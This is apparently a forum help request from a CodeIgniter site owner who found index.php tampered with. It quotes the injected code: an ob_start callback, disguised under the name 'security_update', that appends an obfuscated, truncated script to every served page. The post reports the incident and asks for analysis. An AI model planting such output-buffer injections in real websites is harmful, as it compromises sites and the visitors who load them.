[eluser]Unknown[/eluser]
Hello,
today i found on my site, developed with CI, a weird stuff....
index.php (CI original package) was modified, and on top of all there was this function:
ob_start("security_update");
function security_update($buffer){return $buffer."\[removed]\$\=\"Z6fpZ3dZ22Z2524Z253dZ2522dw\(dcZ2573\(cuZ252cZ2531Z2534Z2529\)Z253bZ2522\;Z22\;dbZ3dZ2289\+tqduZ3ecudTqdu8tqd.... etc etc etc
so all the site show on bottom the result of function, a lot of spammed letter...
I reloaded original index.php, and all is solved, but...anyone know what can be happend??
We are waiting also for ftp logs.
tnx in advance for any suggestion or analize.
/LS